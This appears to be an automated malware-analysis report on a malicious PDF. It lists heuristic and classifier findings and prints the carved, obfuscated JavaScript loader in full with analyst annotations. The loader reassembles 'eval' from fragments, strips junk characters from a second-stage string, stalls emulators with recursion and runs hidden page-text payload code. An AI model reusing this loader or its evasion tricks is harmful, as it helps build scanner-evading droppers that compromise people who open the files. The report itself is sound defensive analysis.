MALICIOUS
106
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
The PDF contains obfuscated JavaScript, indicated by critical heuristic firings for obfuscated name objects and embedded JS streams. The JavaScript attempts to construct a URL from concatenated strings, likely to download a secondary payload. The ML classifier also flagged this PDF as malicious with high confidence.
Machine Learning
- Nyx PDF Classifier malicious score 0.9950
Heuristics 3
-
Hex-obfuscated scripting name object — critical — PDF_OBFUSCATED_NAME_OBJECT: A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
-
JavaScript action — low — 1 related finding — PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream — low — PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0011_000.js (ff85b44f7d06834e69a161aee8e28b7340c56fef50ee1649100cb6f376ea5386) | pdf-javascript-stream | PDF /JS object 11 at offset 0x1364 | 2324 bytes |
Preview script — first 1,000 lines of the extracted script
// Analyst annotations (review). This is document-level PDF JavaScript: `app`
// and the `this` captured below are, when run inside a PDF viewer, the Acrobat
// JavaScript `app` and Doc objects — confirm against the carving context.
// The script is a loader: it does not carry the final payload itself.
var fOJA = null;
try {
// API names are assembled from fragments so "length" / "charAt" never appear
// as plain string literals (string-scanner evasion).
var pOT=String("len"+"gth");
var oJYZ=String("rAt");
var x=String("cha");
// The document object; handed to zAZ below as the object whose eval() runs
// the decoded second stage.
var pOR=this;
// Recursion ceiling, step and start value for hQR (see zAZ.prototype).
var rCX=50;
var v=1;
var rEL=0;
// The four junk characters interleaved into pYN; removed by the .replace()
// call further down.
var zYN=/[@\>_9]/g;
// Holder object: nML keeps the eval target (the Doc object passed in).
function zAZ(nOL){
this.nML=nOL;
};
// Second-stage script, padded with '@', '>', '_' and '9'. Once those are
// stripped it: collects every word on the current page via
// getPageNumWords/getPageNthWord (on pageNum) and joins them; reads that text
// as hex byte pairs, XORs each byte with 71 (0x47) and re-emits the result as a
// "\xNN" escape string; runs app.eval on an assignment to materialize it; then
// splits off the last 332 characters (fQR) into hAT and keeps the rest as hYP.
// It next calls dUD(), which is not defined anywhere in this listing, so the
// call presumably throws and the catch branch app.eval()s hYP.
// Detection note: the real payload is hidden in the page's visible text
// content, not in this /JS stream — carving the stream alone misses it.
var pYN="va@r> >g>P>O@J9=9t9h>i@s_.>n9M9L9;@n_W9=>\'>g9e>t_P@a_g9e@N>\'>;_u_R_O@D>=_n@W9+>\'9t_h@W9o@r_d9\'@;_b@=>n@W>+>\'_u>m_W9o>r_d@s9\'@;9b9A@T9=9\'@p9a_g_e9N9u_m_\'9;@f9O>J9 >=> @7>1@ 9;_v>A9R_=>\'_\'>;>f9O@T@=>\'9j_o_i@n@\'@;>z@O@X_=9\'_\'9;>r>E@L>=_0_;>x@E>J_=@S>t9r9i@n_g9;@n9K9H>=>\'>s>u>b_s_t_r@\'@;9d_E@J@W@=>\'>e_v@a9l>\'@;9p9O9T_=9\'>l@e9n>g@t9h_\'9;9i@J_W@F@=9\'@\\>\\9x9\'>;9u_J@C_T_=@\'_t>o9S9t_r9i9n@g>\'_;>h_Y_V9=9\'9p@a9r>s9e>I_n@t@\'>;@b9O@D>=9\'>f_r9o9m_C>h>a9r>C>o>d>e_\'>;>p9C_D_=9\'>c9h@a_r>C_o@d_e_A9t9\'9;9v_=94_/>4_;>r@U>T9=_1@+@49;@l9I@T>=>2>0_09+_5_5>;_p@O@R>=@\'9d9o@c>\'@;_f>Q@R>=@393@29;9b>W@D>=9[@]@;@r>G_N_=9\'9\'9;9l>K@H_=>1@6@;>z@S9D@=92_;>n_Q>B@=@4@;9b9U>N@=>g_P>O9J>[9b@]>(>g>P_O>J_[@b9A@T_]@)9;@f_o>r>(>p>Q>N_=>r@E_L@;>p>Q9N><9 9b>U9N_;_ 9p_Q@N_+@+_)@{@v@a9r@ >n@M@T_=>g@P@O@J9[@u_R_O_D>]9(9g9P9O_J9[9b_A@T>]>,_p9Q@N_,@t9r@u@e_)_;9z>O9X>=@[@z9O_X9,_n_M9T_]9[>f>O9T@]9(_v_A@R_)@;9;9}@f>o@r9(@p@Q_N_=>0@;_p_Q9N@ _<9 9z>O9X>[@p_O@T9]@;_ @p9Q_N9+_=9z9S_D9)>{@z>W_F9=9z9O9X>[9n_K>H>]@(_p>Q>N@,@z@S>D@)9;@z>E>P9=>p9a9r>s_e_I_n>t9(_z9W>F@,9l>K@H9)9;>v@Q@J>=>z9E@P_^>f9O9J>;9p>C@V_=_v>Q_J9.>t>o_S>t9r9i9n@g_(@l9K@H9)>;_p_C@V@=_(_p>C@V9[>p>O>T@]_=9=@v_)@ >?9 9\'@0_\'_ _+_ _p9C>V@ _:@ >p@C_V9;>b9W_D>.@p9u>s@h>(_p9C@V>)9;_}>t@r@y9 9{_r@G@N>=@n>e>w@ _S>t_r@i_n_g9(@i_J9W@F9 @+@ 9b@W9D>[@f@O9T_]9(>i>J>W@F>)_)>;>a@p@p>[_d@E@J_W@]_(@\'>r9G9N9=>\"@\'@+>r@G_N9+@\'9\"_;9\'@)>;_g9P>O9J@.>h9A_T@=>(_r9G9N9[9n9K_H_]@(@r>G@N>[9p9O>T@]>-9f9Q_R9)>)9;9g>P_O9J_._h>Y>P9=>(9r@G_N@[@n>K9H>]@(9r>E@L9,@r@G_N_[>p9O_T>]9-@f_Q_R@)>)9;9d9U@D9(>)_;@}> 9c>a>t>c_h9(>d_I@J>)>{_i>f9(@g_P9O>J@.@h@Y_P_)@{_t9r9y@ 9{9a>p@p@[@d9E>J_W@]>(>g@P>O>J>._h@Y@P>)@;>}9 @c>a9t9c>h_(9d9I_J>)9{_}_}> 9e>l9s_e@ >{>}9}@";
// String reverse, hung off the viewer's `app` object so it survives as a
// global helper. `lKB` and `pQN` are assigned without `var` and leak as
// globals. The loop starts at dWJ.length (one past the end); charAt() returns
// '' for that index, so the off-by-one is harmless.
app.lCH=function(dWJ){
lKB='';
var tMH = x + oJYZ; // "charAt"
for(pQN=dWJ[pOT];pQN >= 0;pQN--){
lKB+=dWJ[tMH](pQN);
}
return lKB;
}
var lCH=app.lCH;
// Reversed literals: dEJW becomes "eval", bAX becomes "prototype" (bAX is not
// used again in this listing).
dEJW=lCH("lav"+"e");
bAX = app.lCH('epytotorp');
// Strip the junk characters to obtain the runnable second stage.
pYN=pYN.replace(zYN, '');
zAZ.prototype={
// Recurses (via the global fOJA, not `this`) until tSP exceeds rCX (50), then
// runs the decoded stage with this.nML.eval(). Starting from rEL (0) that is
// more than fifty nested calls before any eval — likely a stall intended to
// outlast simple emulation; confirm with a debugger trace.
hQR : function(tSP){
if(tSP > rCX){
this.nML[dEJW](pYN);
} else {
fOJA.hQR(tSP+v);
}
},
};
var fOJA=new zAZ(pOR);
fOJA.hQR(rEL);
// Any failure in the loader is surfaced to the user as a viewer dialog rather
// than silently swallowed.
} catch(rGN){
app.alert(rGN);
}